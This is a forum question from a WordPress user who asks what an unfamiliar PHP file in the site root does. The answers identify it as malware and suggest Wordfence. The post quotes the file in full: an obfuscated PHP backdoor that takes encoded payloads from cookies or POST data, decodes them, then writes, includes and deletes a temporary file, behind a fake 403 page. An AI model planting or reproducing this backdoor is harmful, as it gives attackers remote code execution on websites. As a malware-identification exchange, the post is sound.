# New file appeared on root folder. Is it for wordpress?

Tags: php, wordpress

I'm new to wordpress and do not fully understand which files of wordpress are its own and which are not. Theres a file on root folder by the name b5tzvh8n.php with the following content:

```php
<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
function z1($f2){$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;$z5='';foreach($f2 as $v4){$z5.=$b3[$v4];}return $z5;}$p6 = Array();$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));foreach ($p6[8]($_COOKIE, $_POST) as $m14 => $e11){function r8($p6, $m14, $y10){return $p6[11]($p6[9]($m14 . $p6[0], ($y10 / $p6[13]($m14)) + 1), 0, $y10);}function x7($p6, $u12){return @$p6[14]($p6[3], $u12);}function y9($p6, $u12){if (isset($u12[2])) {$s13 = $p6[4] . $p6[15]($p6[0]) . $p6[2];@$p6[7]($s13, $p6[6] . $p6[1] . $u12[1]($u12[2]));@include($s13);@$p6[12]($s13);exit();}}$e11 = x7($p6, $e11);y9($p6, $p6[10]($p6[5], $e11 ^ r8($p6, $m14, $p6[13]($e11))));}
```

What is the purpose of this file?

Comment: Your site is affected by malware. Probably you're using either a nulled plugin/theme, or either of the plugins/themes has a serious vulnerability !!

Comment: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Comment: I’m voting to close this question because this question is not related to programming

Answer (score 1, accepted):

This is malware, you should install a plugin like [Wordfence](https://www.wordfence.com/products/wordfence-free/). It will allow you to find the infected files and hopefully also the point of entry.
You should be aware that this happens often from nulled sofware packages.